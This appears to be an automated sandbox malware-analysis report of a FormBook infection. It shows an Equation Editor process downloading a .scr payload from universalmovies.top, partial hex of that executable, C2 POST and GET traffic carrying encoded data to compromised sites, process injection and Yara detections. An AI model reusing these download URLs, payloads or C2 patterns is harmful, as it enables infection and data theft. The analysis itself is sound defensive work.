                                                                                            Date: Thu, 02 May 2024 06:29:16 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8k
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: 35ab4bcfd5b56cd95859fe76c1fcca66-bos-edge1
                                                                                            x-hcdn-cache-status: MISS
                                                                                            x-hcdn-upstream-rt: 0.132
                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>
May 2, 2024 08:29:16.926553965 CEST | 72 | IN
                                                                                            Data Ascii: The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.22 | 49194 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:29:27.912276983 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            Origin: http://www.jnkinteractive.co.kr
                                                                                            Referer: http://www.jnkinteractive.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:29:28.776334047 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.22 | 49195 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:29:30.726321936 CEST | 744 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            Origin: http://www.jnkinteractive.co.kr
                                                                                            Referer: http://www.jnkinteractive.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Ascii: pl=JZKxbQTXVGqeBV7zAKGagblwqaqPH5YFoYpxG8dTm9rBNMceD4wOJAM7muNTByh+HbMCHIsahoewzy+TBMqqkACcGMlMugQG2OPbq/yl9rrM/vi3JNs36KZEneRn3wBkGLSv8J0BAki0yGfUvUAdcCSTKCCM8U9FNa3nWZtx0i7f9HzU4da+2TbwX43Sy+KGOA==
May 2, 2024 08:29:31.296595097 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.22 | 49196 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:29:33.535666943 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            Origin: http://www.jnkinteractive.co.kr
                                                                                            Referer: http://www.jnkinteractive.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                             May 2, 2024 08:29:34.374264002 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip


                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             33 | 192.168.2.22 | 49197 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             May 2, 2024 08:29:36.365324974 CEST | 473 | OUT | GET /ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                             May 2, 2024 08:29:36.928196907 CEST | 511 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8k


                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             34 | 192.168.2.22 | 49198 | 208.91.197.13 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             May 2, 2024 08:29:50.568864107 CEST | 2440 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.riveramayahousing.com
                                                                                            Origin: http://www.riveramayahousing.com
                                                                                            Referer: http://www.riveramayahousing.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             35 | 192.168.2.22 | 49199 | 208.91.197.13 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             May 2, 2024 08:29:53.182307005 CEST | 747 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.riveramayahousing.com
                                                                                            Origin: http://www.riveramayahousing.com
                                                                                            Referer: http://www.riveramayahousing.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             36 | 192.168.2.22 | 49200 | 208.91.197.13 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             May 2, 2024 08:29:55.788033962 CEST | 2440 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.riveramayahousing.com
                                                                                            Origin: http://www.riveramayahousing.com
                                                                                            Referer: http://www.riveramayahousing.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             37 | 192.168.2.22 | 49201 | 208.91.197.13 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             May 2, 2024 08:29:58.393846989 CEST | 474 | OUT | GET /ufuh/?pl=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.riveramayahousing.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                             May 2, 2024 08:29:58.718971968 CEST | 538 | IN | HTTP/1.1 200 OK
                                                                                            Date: Thu, 02 May 2024 06:29:57 GMT
                                                                                            Server: Apache
                                                                                            Set-Cookie: vsid=928vr46217699796753390; expires=Tue, 01-May-2029 06:29:57 GMT; Max-Age=157680000; path=/; domain=www.riveramayahousing.com; HttpOnly
                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BUVgkU9SpCnHQ8oULqnTgicRnkkNtgpShIapMsQeWrY282jo0jLgfAIGTYA6YB3wLI68m1kQIaVlKspL7KBAlg==
                                                                                            Content-Length: 3246
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Connection: close


                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             0 | 192.168.2.22 | 49163 | 104.21.74.191 | 443 | 1808 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             2024-05-02 06:26:08 UTC | 313 | OUT | GET /opp.scr HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: universalmovies.top
                                                                                            Connection: Keep-Alive
                                                                                             2024-05-02 06:26:08 UTC | 775 | IN | HTTP/1.1 200 OK
                                                                                            Date: Thu, 02 May 2024 06:26:08 GMT
                                                                                            Content-Type: application/x-silverlight
                                                                                            Content-Length: 636928
                                                                                            Connection: close
                                                                                            Last-Modified: Thu, 02 May 2024 01:44:58 GMT
                                                                                            ETag: "9b800-6176ec02e1567"
                                                                                            Accept-Ranges: bytes
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wIecbPPYO9RapwSjTb5jsmCFDJVN2%2FMRjyYMJxT%2FX%2FJMvdu4GdEyuna2Q5cM%2B%2FxqX9OzXV5SNXeMME5kPpHKcEi5KCEOYJVgnDY1g45EIdiVB2kTO0s5G7K9%2BBRtEw33DrWZ2Elf"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 87d5f023cde61871-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            2024-05-02 06:26:08 UTC594INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f a3 00 ca 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ac 09 00 00 0a 00 00 00 00 00 00 0e cb 09 00 00 20 00 00 00 e0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL/0 @ @


                                                                                            Target ID:0
                                                                                            Start time:08:26:02
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                            Imagebase:0x13ff80000
                                                                                            File size:1'423'704 bytes
                                                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:2
                                                                                            Start time:08:26:03
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:08:26:08
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\op55336.scr
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\op55336.scr"
                                                                                            Imagebase:0xdd0000
                                                                                            File size:636'928 bytes
                                                                                            MD5 hash:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.351612822.0000000000D40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:08:26:09
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\op55336.scr
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\op55336.scr"
                                                                                            Imagebase:0xdd0000
                                                                                            File size:636'928 bytes
                                                                                            MD5 hash:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:08:26:28
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe"
                                                                                            Imagebase:0x1f0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:08:26:30
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\dfrgui.exe"
                                                                                            Imagebase:0x9e0000
                                                                                            File size:586'752 bytes
                                                                                            MD5 hash:FB036244DBD2FADC225AD8650886B641
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Target ID:9
                                                                                            Start time:08:26:33
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:12
                                                                                            Start time:08:26:45
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe"
                                                                                            Imagebase:0x1f0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:14
                                                                                            Start time:08:27:04
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x12c0000
                                                                                            File size:517'064 bytes
                                                                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0066F000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_66f000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *yT$*yT$t
                                                                                              • API String ID: 0-1495078640
                                                                                              • Opcode ID: 3af9d9933c86a906b7d87e7a270e2ca88e31827f8417bd59d9698723503cbb81
                                                                                              • Instruction ID: 7b99f38d68a741b2c7732a4d30e34167904e846ae16359b642982531e0b3ce12
                                                                                              • Opcode Fuzzy Hash: 3af9d9933c86a906b7d87e7a270e2ca88e31827f8417bd59d9698723503cbb81
                                                                                              • Instruction Fuzzy Hash: B342ED6240E3C19FC7178B344C795907FB1AE23218B1E46DBC8D5CF9E3E219991AC766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:20.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:44
                                                                                              Total number of Limit Nodes:1
